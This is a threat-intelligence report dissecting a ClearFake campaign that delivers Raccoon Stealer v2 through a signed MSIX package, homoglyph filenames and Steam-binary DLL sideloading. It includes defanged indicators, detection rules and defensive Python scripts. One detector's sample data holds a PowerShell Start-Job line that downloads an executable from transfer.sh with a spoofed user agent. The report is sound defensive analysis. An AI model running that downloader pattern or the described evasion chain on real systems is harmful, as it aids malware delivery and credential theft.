ClearFake Meets HijackLoader: Dissecting a Raccoon Stealer v2 Campaign Built on Signed MSIX Packages and Cyrillic Homoglyphs
TL;DR: A weaponized MSIX package disguised as a Microsoft Edge installer delivers Raccoon Stealer v2 through a four-stage infection chain: ClearFake fake browser update social engineering leads to a code-signed MSIX package (signed by UK entity STECH CONSULTANCY LIMITED via SSL.com), which triggers PowerShell-based payload retrieval from transfer[.]sh, followed by DLL sideloading through a legitimate Valve/Steam binary (HijackLoader technique). The package filename uses five Cyrillic Unicode homoglyph characters to visually impersonate "MicrosoftEdgeSetup.appx" while evading filename-based blocklists. The final payload is a 19.4 MB NSIS installer embedded as a PE overlay in the Steam binary, delivering Raccoon Stealer v2 for credential theft, browser data exfiltration, and cryptocurrency wallet harvesting.
Key Findings
This investigation reveals a carefully layered attack chain that abuses trust at every stage -- from compromised websites to legitimate code signing certificates to trusted application binaries. Each component is designed to defeat a specific defensive layer.
Unicode Homoglyph Filename Spoofing
The MSIX package filename is not what it appears to be. Five Cyrillic Unicode characters are substituted for their visually identical Latin counterparts:
| Position | Displayed Character | Code Point | Unicode Name | Script |
|---|---|---|---|---|
| 3 | c | U+0441 | Cyrillic Small Letter Es | Cyrillic |
| 5 | o | U+043E | Cyrillic Small Letter O | Cyrillic |
| 7 | o | U+043E | Cyrillic Small Letter O | Cyrillic |
| 10 | E | U+0415 | Cyrillic Capital Letter Ie | Cyrillic |
| 13 | e | U+0435 | Cyrillic Small Letter Ie | Cyrillic |
| 15 | e | U+0435 | Cyrillic Small Letter Ie | Cyrillic |
The rendered filename appears as MicrosoftEdgeSetup.appx to the human eye, but the underlying byte sequence is entirely different from the ASCII representation. This defeats any filename-based blocklist or detection rule that checks for the string "MicrosoftEdgeSetup" using standard string matching.
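The mixed-script check described above, as an added example that is not part of the original report: it flags a filename whose letters come from more than one Unicode script, lists each substituted character with its code point, and folds the known Cyrillic look-alikes to Latin so that a blocklist comparison succeeds where naive string matching fails. The spoofed name is reconstructed from the positions in the table, and the confusables mapping is a constructed subset, not a complete table.

```python
import unicodedata

# Cyrillic letters that render like Latin ones. Constructed subset for the
# example: the four code points from the table above plus a few other common
# confusables. Not a complete confusables table.
CYRILLIC_TO_LATIN = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
}


def script_of(ch: str) -> str:
    """Script family taken from the Unicode character name ("LATIN", "CYRILLIC", ...)."""
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def skeleton(name: str) -> str:
    """Fold known Cyrillic look-alikes to Latin. NFKC normalization does not do
    this, so a confusables map is required."""
    return "".join(CYRILLIC_TO_LATIN.get(ch, ch) for ch in name)


def analyze_filename(name: str) -> dict:
    """Flag a mixed-script filename and list every substituted character (1-based position)."""
    scripts = {script_of(ch) for ch in name if ch.isalpha()}
    substitutions = [
        (pos, f"U+{ord(ch):04X}", unicodedata.name(ch))
        for pos, ch in enumerate(name, start=1)
        if ch in CYRILLIC_TO_LATIN
    ]
    return {
        "mixed_script": len(scripts) > 1,
        "scripts": sorted(scripts),
        "skeleton": skeleton(name),
        "substitutions": substitutions,
    }


def blocklist_hit(name: str, blocklist: set) -> tuple:
    """(naive match, skeleton match) against a lower-cased blocklist."""
    return name.lower() in blocklist, skeleton(name).lower() in blocklist


# Constructed reproduction of the spoofed filename, built from the table's positions.
SPOOFED = "Mi\u0441r\u043es\u043eft\u0415dg\u0435S\u0435tup.appx"
BLOCKLIST = {"microsoftedgesetup.appx"}

if __name__ == "__main__":
    report = analyze_filename(SPOOFED)
    print("mixed script:", report["mixed_script"], report["scripts"])
    print("skeleton    :", report["skeleton"])
    for pos, cp, uname in report["substitutions"]:
        print(f"  position {pos:>2}: {cp} {uname}")
    print("blocklist naive/skeleton:", blocklist_hit(SPOOFED, BLOCKLIST))
```

Running it shows the naive blocklist lookup missing the file while the skeleton lookup catches it, which is the gap a filename-based rule needs to close; the same mixed-script test generalizes to any brand name, not just the Edge installer.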
Legitimate Code Signing Certificate Abuse
The MSIX package is signed with a legitimate SSL.com Code Signing certificate issued to STECH CONSULTANCY LIMITED, a UK company registered in Poringland, GB:
- Subject: CN=STECH CONSULTANCY LIMITED, O=STECH CONSULTANCY LIMITED, L=Poringland, C=GB
- Issuer: SSL.com Code Signing Intermediate CA RSA R1
- Serial: 0ad3ec95833032eebf53b660984cc67d
- Validity: 2023-04-03 to 2024-04-01
- Thumbprint (SHA256): 7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97
The certificate was valid at the time of the sample's first observation (September 2023). Code-signed MSIX packages bypass Windows SmartScreen warnings, significantly increasing the likelihood that victims will execute the package without suspicion.
ClearFake Distribution Network
The sample is tagged by multiple vendors as part of the ClearFake campaign -- a JavaScript injection framework that compromises legitimate websites to display fake browser update pages. The ClearFake chain works as follows:
- Legitimate WordPress/CMS sites are compromised via stolen credentials or plugin vulnerabilities.
- Injected JavaScript displays a convincing "Update Microsoft Edge" overlay.
- Victims are redirected to download the weaponized MSIX package.
- The code signature provides the final trust nudge to overcome user hesitation.
Legitimate Binary Sideloading
The HijackLoader component uses KSPSService.exe, which is actually a legitimate Valve/Steam secure_desktop_capture binary signed by McAfee. This binary imports tier0_s.dll and crashhandler.dll as part of its normal Steam framework dependencies. By placing trojanized versions of these DLLs in the same directory, the attacker exploits Windows DLL search order to load malicious code through a trusted, signed executable.
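A hunting check for the sideloading pattern just described, added here as an example and not taken from the report or any vendor tooling: it walks constructed Sysmon-style image-load records (field names follow Sysmon Event ID 7) and flags tier0_s.dll or crashhandler.dll whenever either the DLL or the process loading it lives outside the Steam install directories. The Steam directories, user names and file paths in the sample are assumed for the example.

```python
import ntpath

# DLLs the report names as sideloaded beside KSPSService.exe.
WATCHED_DLLS = {"tier0_s.dll", "crashhandler.dll"}

# Where a Steam client legitimately loads these DLLs. Assumed defaults for the
# example; adjust to the install paths used in your fleet.
LEGIT_STEAM_DIRS = (
    "c:\\program files (x86)\\steam\\",
    "c:\\program files\\steam\\",
)


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value | key=value' record into a dict."""
    fields = {}
    for token in line.split(" | "):
        key, _, value = token.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def in_steam_dir(path: str) -> bool:
    return path.lower().startswith(LEGIT_STEAM_DIRS)


def is_suspicious_load(ev: dict) -> bool:
    """True when a watched DLL is loaded from, or by a process outside, the Steam directories."""
    if ev.get("EventID") != "7":
        return False
    loaded = ev.get("ImageLoaded", "")
    if ntpath.basename(loaded).lower() not in WATCHED_DLLS:
        return False
    # Both the DLL and the loading process must sit under Steam to be benign.
    return not (in_steam_dir(loaded) and in_steam_dir(ev.get("Image", "")))


def hunt(lines) -> list:
    """Return (Image, ImageLoaded) pairs worth triaging."""
    return [(ev["Image"], ev["ImageLoaded"])
            for ev in map(parse_event, lines) if is_suspicious_load(ev)]


# Constructed sample telemetry; the user name and drop directory are invented.
SAMPLE_EVENTS = [
    r"EventID=7 | Image=C:\Program Files (x86)\Steam\steam.exe | ImageLoaded=C:\Program Files (x86)\Steam\tier0_s.dll | Signed=true",
    r"EventID=7 | Image=C:\Users\alice\AppData\Roaming\MsEdge\KSPSService.exe | ImageLoaded=C:\Users\alice\AppData\Roaming\MsEdge\tier0_s.dll | Signed=false",
    r"EventID=7 | Image=C:\Users\alice\AppData\Roaming\MsEdge\KSPSService.exe | ImageLoaded=C:\Users\alice\AppData\Roaming\MsEdge\crashhandler.dll | Signed=false",
    r"EventID=7 | Image=C:\Windows\System32\svchost.exe | ImageLoaded=C:\Windows\System32\ntdll.dll | Signed=true",
    r"EventID=1 | Image=C:\Users\alice\AppData\Roaming\MsEdge\KSPSService.exe | CommandLine=KSPSService.exe",
]

if __name__ == "__main__":
    for image, dll in hunt(SAMPLE_EVENTS):
        print(f"SUSPICIOUS: {image} loaded {dll}")
```

The rule keys on location rather than on the host binary's hash, so it still fires if the actor swaps KSPSService.exe for another Steam component that imports the same DLLs; pair it with the Signed=false field from the same event to raise confidence.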
Attack Chain
The infection progresses through four distinct stages, each adding a layer of legitimacy and evasion.
Stage 1: ClearFake Social Engineering
[Compromised Website]
|
v
[ClearFake JavaScript Injection]
|
v
[Fake "Update Microsoft Edge" Prompt]
|
v
[Download: Ml<U+0441>r<U+043E>s<U+043E>ft<U+0415>dg<U+0435>S<U+0435>tup.appx]
(Appears as MicrosoftEdgeSetup.appx)
(Code-signed by STECH CONSULTANCY LIMITED)
Stage 2: MSIX Package Execution
The MSIX package installs via Windows App Installer with the following identity:
- Package Name: MicrosoftCorporation.Edge
- Publisher Display Name: Microsoft Corporation (spoofed)
- Actual Publisher: CN=STECH CONSULTANCY LIMITED
- Capability: runFullTrust
- Builder: Advanced Installer 21.0.1 (build 2178626c)
The package uses the MSIX Package Support Framework (PSF), a legitimate Microsoft framework designed to apply runtime fixups to Win32 desktop applications packaged as MSIX. The entry point AI_STUBS\AiStubX64.exe reads a config.json file and triggers the PSF start script.
Stage 3: PowerShell Payload Download
The PSF start script chrome.ps1 executes:
[Net.ServicePointManager]::SecurityProtocol = TLS 1.2 | TLS 1.3
Download from: hxxps://transfer[.]sh/get/7rozvr4XO3/MicrosoftEdgeSetup[.]exe
Save to: %APPDATA%\MicrosoftEdgeSetup.exe
User-Agent: Chrome 116 spoof
Method: Start-Job (background execution for evasion)
Key OPSEC features:
- Forces TLS 1.2/1.3 to avoid plaintext interception
- Spoofs a Chrome 116 User-Agent to blend with normal traffic
- Uses Start-Job for background execution, reducing visibility in process trees
- The transfer[.]sh URL is ephemeral and may already be expired
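A script-block scoring check for the downloader pattern described in the OPSEC list above (and recommended as a block pattern under Long-Term Hardening), added as an example that is not part of the report's own detection content: it scans PowerShell script-block log text for Start-Job, a download cmdlet, a file-sharing host, TLS forcing and user-agent spoofing, and grades the combination. The file-sharing host list and the three sample script blocks are constructed; the first sample uses a placeholder URL path and is a generic illustration, not the campaign's chrome.ps1.

```python
import re
from urllib.parse import urlparse

# File-sharing hosts commonly abused for staging. Constructed list; extend per environment.
FILE_SHARING_HOSTS = {"transfer.sh"}

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|Net\.WebClient|DownloadFile)\b", re.IGNORECASE)
START_JOB_RE = re.compile(r"\bStart-Job\b", re.IGNORECASE)
TLS_FORCE_RE = re.compile(r"SecurityProtocol", re.IGNORECASE)
UA_RE = re.compile(r"-UserAgent\b|User-Agent", re.IGNORECASE)


def score_script_block(text: str) -> dict:
    """Grade one script block: 'high' for Start-Job + download cmdlet + file-sharing host,
    'medium' for a download from a file-sharing host without Start-Job, else 'low'."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    hosts.discard(None)
    flags = {
        "start_job": bool(START_JOB_RE.search(text)),
        "download_cmdlet": bool(DOWNLOAD_RE.search(text)),
        "file_sharing_host": any(h in FILE_SHARING_HOSTS for h in hosts),
        "tls_forced": bool(TLS_FORCE_RE.search(text)),
        "ua_spoof": bool(UA_RE.search(text)),
    }
    if flags["start_job"] and flags["download_cmdlet"] and flags["file_sharing_host"]:
        verdict = "high"
    elif flags["download_cmdlet"] and flags["file_sharing_host"]:
        verdict = "medium"
    else:
        verdict = "low"
    return {"hosts": sorted(hosts), "flags": flags, "verdict": verdict}


# Constructed script-block log excerpts (placeholder URL path, invented file names).
SAMPLE_SCRIPT_BLOCKS = [
    r"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Start-Job -ScriptBlock { Invoke-WebRequest -Uri 'https://transfer.sh/get/EXAMPLEID/setup.exe' -OutFile "$env:APPDATA\setup.exe" -UserAgent 'Mozilla/5.0' }""",
    r"""Invoke-WebRequest -Uri 'https://www.example.com/report.csv' -OutFile C:\Temp\report.csv""",
    r"""Start-Job -ScriptBlock { Get-ChildItem C:\Logs | Measure-Object }""",
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        result = score_script_block(block)
        print(result["verdict"].upper(), result["hosts"], result["flags"])
```

The grading separates the two benign cases (a plain corporate download, a Start-Job doing local work) from the combination the report describes; the tls_forced and ua_spoof flags are reported alongside so an analyst can see which of the OPSEC features were present without them alone driving the verdict.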
Stage 4: HijackLoader and Raccoon Stealer v2
[MicrosoftEdgeSetup.exe -- Legitimate MS Edge stub (DECOY)]
|
+ (Meanwhile, VFS\AppData\KSPSService.exe executes)
|
v
[KSPSService.exe -- Valve/Steam secure_desktop_capture]
|-- PE Overlay: 19.42 MB NSIS installer (LZMA, DEADBEEF magic)
|-- DLL sideloading: tier0_s.dll, crashhandler.dll
|
v
[PsfRuntime32.dll / PsfRuntime64.dll]
|-- Process injection via CreateProcess + GetThreadContext
|-- Microsoft Detours library for API hooking
|
v
[NSIS Installer Extraction + Raccoon Stealer v2]
|-- Browser credential theft
|-- Cryptocurrency wallet harvesting
|-- Cookie and autofill extraction
|-- System fingerprinting
|-- C2 beaconing
Infrastructure Analysis
Payload Staging
| Component | Host | IP | ASN | Status |
|---|---|---|---|---|
| transfer[.]sh payload | Hetzner Online GmbH | 144[.]76[.]136[.]153 | Hetzner | LIVE |
The payload staging server at 144[.]76[.]136[.]153 runs OpenSSH 9.2p1 on Debian with only port 22 exposed. The transfer[.]sh service is a legitimate file sharing platform frequently abused for malware staging because of its ephemeral link structure -- files are automatically deleted after a configurable period, and the random URL path (7rozvr4XO3) is not enumerable.
Code Signing Infrastructure
The STECH CONSULTANCY LIMITED certificate was issued by SSL.com, a certificate authority that offers code signing certificates with organization validation. The certificate was valid for one year (April 2023 to April 2024). Several possibilities exist for how it was obtained:
- Fraudulent company registration: The UK company may have been created specifically for obtaining code signing certificates.
- Certificate theft: The legitimate company's certificate may have been compromised.
- Insider sale: The company or an employee may have sold certificate access.
The certificate is not listed on any Certificate Suspension/Ban List (CSCB) as of this investigation, meaning it has not been formally revoked or flagged by the CA ecosystem.
MSIX Package Construction
The package was built with Caphyon Advanced Installer 21.0.1, a legitimate commercial packaging tool. The PDB paths in the embedded binaries all point to C:\ReleaseAI\, which is the standard Advanced Installer build output directory. This indicates the attacker used a licensed or cracked copy of Advanced Installer to create a professional-quality MSIX package.
NSIS Overlay Details
The HijackLoader host binary (KSPSService.exe) contains a 19.42 MB PE overlay starting at offset 0x2A8600:
| Property | Value |
|---|---|
| Size | 20,364,360 bytes (19.42 MB) |
| Magic | EFBEADDE (DEADBEEF little-endian) |
| Identifier | NullsoftInst |
| Compression | LZMA (0x5D marker) |
| Entropy | 7.9784 bits/byte |
The near-maximum entropy (8.0 = perfectly random) confirms the overlay is encrypted or compressed data, consistent with LZMA-compressed NSIS installers.
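The overlay triage described in this section, as an added example that is not the report's own tooling: it computes where the overlay starts from the PE section table (the end of the last section's raw data), searches the overlay for the NSIS marker (0xDEADBEEF little-endian followed by NullsoftInst) and measures Shannon entropy. Because the real sample is not reproduced here, the script builds a constructed minimal PE with a pseudo-random overlay; the layout constants of that fake PE are assumptions for the example only.

```python
import math
import random
import struct

# NSIS "firstheader" signature: 0xDEADBEEF little-endian, then "NullsoftInst".
NSIS_MARKER = b"\xef\xbe\xad\xdeNullsoftInst"


def overlay_offset(pe: bytes) -> int:
    """File offset where overlay data begins: the end of the last section's raw data."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_header_size, = struct.unpack_from("<H", pe, coff + 16)
    section_table = coff + 20 + opt_header_size
    end = 0
    for i in range(num_sections):
        entry = section_table + i * 40          # IMAGE_SECTION_HEADER is 40 bytes
        size_of_raw, ptr_to_raw = struct.unpack_from("<II", pe, entry + 16)
        end = max(end, ptr_to_raw + size_of_raw)
    return end


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling for uniformly random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def analyze_overlay(pe: bytes) -> dict:
    """Locate the overlay, look for the NSIS marker in it, and measure its entropy."""
    start = overlay_offset(pe)
    overlay = pe[start:]
    return {
        "overlay_offset": start,
        "overlay_size": len(overlay),
        "nsis_marker_offset": overlay.find(NSIS_MARKER),   # -1 when absent
        "entropy": round(shannon_entropy(overlay), 4),
    }


def build_sample_pe(overlay: bytes) -> bytes:
    """Constructed minimal x64 PE: one 0x200-byte section at file offset 0x200, no optional header."""
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff_header = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x0022)  # 1 section, opt hdr size 0
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos_header + b"PE\0\0" + coff_header + section).ljust(0x200, b"\0")
    return headers + b"\x90" * 0x200 + overlay


# Constructed overlay: NSIS firstheader layout (flags, marker) followed by
# seeded pseudo-random bytes standing in for LZMA-compressed data.
_rng = random.Random(2023)
SAMPLE_OVERLAY = (struct.pack("<I", 0x80000000) + NSIS_MARKER
                  + bytes(_rng.getrandbits(8) for _ in range(4096)))
SAMPLE_PE = build_sample_pe(SAMPLE_OVERLAY)
CLEAN_PE = build_sample_pe(b"")

if __name__ == "__main__":
    for label, sample in (("with NSIS overlay", SAMPLE_PE), ("no overlay", CLEAN_PE)):
        r = analyze_overlay(sample)
        print(f"{label}: offset=0x{r['overlay_offset']:X} size={r['overlay_size']} "
              f"nsis_marker_at={r['nsis_marker_offset']} entropy={r['entropy']}")
```

Run against the real host binary, the same function would report the offset, size and entropy the table above lists (0x2A8600, 20,364,360 bytes, 7.9784); the marker offset of 4 reflects the four-byte flags field that precedes the signature in an NSIS first header. An entropy close to 8.0 alone does not distinguish compression from encryption, which is why the marker check is paired with it.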
Detection
YARA Summary
Detection rules target multiple stages of this attack chain:
- MSIX/APPX Package Detection: Matches the combination of AppxManifest.xml markers, the STECH CONSULTANCY LIMITED publisher string, and the runFullTrust capability declaration. This catches the delivery package before execution.
- Unicode Homoglyph Filename: Detects files containing mixed Latin and Cyrillic characters in sequences that approximate common software names (Microsoft, Edge, Chrome, Firefox). This is a behavioral rule that catches the social engineering technique regardless of the specific payload.
- HijackLoader via Steam Binary: Matches the Valve/Steam secure_desktop_capture PDB path combined with unusual PE overlay sizes (>10 MB), identifying the legitimate binary being abused as a sideloading host.
- PowerShell transfer.sh Downloader: Detects PowerShell scripts that download from transfer.sh URLs, particularly when combined with TLS forcing and user-agent spoofing.
Suricata Summary
Network detection rules cover:
- transfer.sh Payload Download: Alerts on HTTPS connections to transfer[.]sh with the specific URL path pattern (/get/[alphanumeric]/), particularly when the response contains PE headers or large binary payloads.
- MSIX Installation from External Source: Detects App Installer protocol handler invocations for packages downloaded from non-Microsoft domains.
- ClearFake JavaScript Injection Patterns: Matches the characteristic JavaScript injection patterns used by ClearFake to display fake browser update overlays on compromised websites.
IOCs (Defanged)
Network Indicators
hxxps://transfer[.]sh/get/7rozvr4XO3/MicrosoftEdgeSetup[.]exe
144[.]76[.]136[.]153 (transfer[.]sh staging -- Hetzner Online GmbH)
File Indicators
MSIX Package (Delivery):
SHA256: b583d86c4abc6d6ca57bde802b7e9d8143a249aed6a560a4626e79ae13f6209d
SHA1: 10e3b5e5cabcfbe1e79caa1a47efd994122d5429
MD5: a7900cdbb2912d76aa6329c5c41d8609
KSPSService.exe (HijackLoader Host):
SHA256: d60d4da2cfe120138a3fde66694b40ae2710cfc2af33cb7810b3a0e9b1663a4f
SHA1: 78e17bd7e30c66aaef91a5b5fcb36a036a1074b7
MD5: d113b3debc7e0a2da4369dd8d1dbad53
Imphash: df40d8be5c4e5f68cce5e2718020b391
MicrosoftEdgeSetup.exe (Legitimate Decoy):
SHA256: 7d94e045fc80fb985385702b11312b6dbadecf802168328cb0db0f62cc66fa3c
SHA1: 1890ad1d2b7dd04f6b4f07a50362662436ace295
MD5: 58d8d75b0ca5e316862ed81cdb2d0c67
AiStubX64.exe (MSIX Entry Point):
SHA256: 815d2e32e948681c85d56aff9eb9ac597647effa8da6db2b81fa2109f9875ff6
PsfRuntime32.dll (Injector):
SHA256: 4fdcf20237f161fb827bccd1faaee61217e5f8d3229a8dff507c98d1bda9aac6
PsfRuntime64.dll (Injector):
SHA256: 8b86893d2a721474b816bfc0228dbbe9b9bc6c1d7bde870c37200074501081fb
chrome.ps1 (PowerShell Downloader):
SHA256: ce54b949607227a4b5b1f521b5ec0c37e4bde1549c667e53f56cf3b5b6156d35
config.json (PSF Configuration):
SHA256: f5a0191c8622041d31ecfa05f90718b74034b8645a37ee41e7570769e138bda6
Behavioral Indicators
Registry key: Software\Caphyon\Advanced Installer\MicrosoftEdgeSetup.exe
Registry key: SOFTWARE\Microsoft\EdgeUpdate\WindowsUpdateAttempts
File drop path: %APPDATA%\MicrosoftEdgeSetup.exe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
MSIX Publisher: CN=STECH CONSULTANCY LIMITED, O=STECH CONSULTANCY LIMITED, L=Poringland, C=GB
Cert Thumbprint: 7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97
Cert Serial: 0ad3ec95833032eebf53b660984cc67d
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Application |
|---|---|---|---|
| Initial Access | Drive-by Compromise | T1189 | ClearFake JavaScript injection on compromised websites |
| Execution | User Execution: Malicious File | T1204.002 | Victim installs MSIX package from fake update prompt |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | chrome.ps1 downloads and executes second-stage payload |
| Persistence | Boot or Logon Autostart Execution | T1547 | MSIX package registration persists across reboots |
| Defense Evasion | Masquerading: Match Legitimate Name | T1036.005 | Unicode homoglyph filename spoofing + Edge branding |
| Defense Evasion | Subvert Trust Controls: Code Signing | T1553.002 | STECH CONSULTANCY LIMITED SSL.com certificate |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 | tier0_s.dll and crashhandler.dll sideloading via Steam binary |
| Defense Evasion | Obfuscated Files: Software Packing | T1027.002 | LZMA-compressed NSIS installer in PE overlay |
| Defense Evasion | Process Injection | T1055 | PsfRuntime DLL injection via Microsoft Detours |
| Command and Control | Ingress Tool Transfer | T1105 | Payload download from transfer[.]sh |
| Credential Access | Credentials from Password Stores | T1555 | Raccoon Stealer v2 browser credential theft |
| Collection | Data from Local System | T1005 | Cryptocurrency wallet harvesting and system fingerprinting |
Threat Actor Assessment
Attribution
- Confidence: LOW-MEDIUM
- Campaign: ClearFake distribution network
- Region: Eastern European nexus. The use of Cyrillic Unicode homoglyphs indicates native familiarity with the Cyrillic script, pointing to operators from Russia, Ukraine, or Bulgaria. Raccoon Stealer v2 itself is a Russian-origin MaaS product.
- Motivation: Financial -- commodity credential theft at scale
Operational Security
Strengths:
- Legitimate code signing certificate from an established CA
- Ephemeral transfer[.]sh links that auto-expire
- Legitimate binary sideloading (Valve/Steam signed by McAfee)
- Professional MSIX packaging with Advanced Installer
- PowerShell background job execution to reduce process visibility
Weaknesses:
- Cyrillic homoglyph selection reveals script familiarity (attribution fingerprint)
- Advanced Installer PDB paths (C:\ReleaseAI\) are standard and traceable
- Sample submitted to MalwareBazaar by crep1x with origin tagged as France
- The specific Valve/Steam binary choice creates a distinctive sideloading signature
Why This Campaign Matters
This operation represents the commoditization of trust abuse in the Windows ecosystem. Every component -- the ClearFake injection, the MSIX packaging, the code signing, the PSF framework, the Steam binary -- is a legitimate technology being weaponized. Defenders cannot simply block these components without breaking legitimate functionality. The defense challenge is distinguishing malicious combinations of legitimate tools from their normal use, which requires behavioral analysis and correlation rather than signature-based detection.
Defensive Recommendations
Immediate Actions
- Block the certificate thumbprint 7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97 in endpoint protection.
- Hunt for KSPSService.exe and chrome.ps1 on endpoints.
- Block transfer[.]sh at the web proxy for organizations that do not use it legitimately.
- Submit a certificate revocation request to SSL.com for serial 0ad3ec95833032eebf53b660984cc67d.
Policy Changes
- Implement MSIX/APPX sideloading restrictions via Group Policy. Only allow packages from the Microsoft Store or trusted internal sources.
- Block MSIX packages requesting the runFullTrust capability from untrusted publishers.
- Deploy Unicode homoglyph detection in email and web gateway filename inspection.
- Monitor for tier0_s.dll and crashhandler.dll loading outside of legitimate Steam directories.
Long-Term Hardening
- Implement application control policies that restrict which binaries can load DLLs from their own directory (preventing sideloading abuse).
- Deploy ClearFake JavaScript injection detection on managed web properties.
- Consider blocking PowerShell Start-Job combined with Invoke-WebRequest to external file sharing services as a high-confidence malicious pattern.
Published by Breakglass Intelligence -- GHOST automated analysis pipeline. Investigation ID: raccoon-march10 | TLP:WHITE | 2026-03-10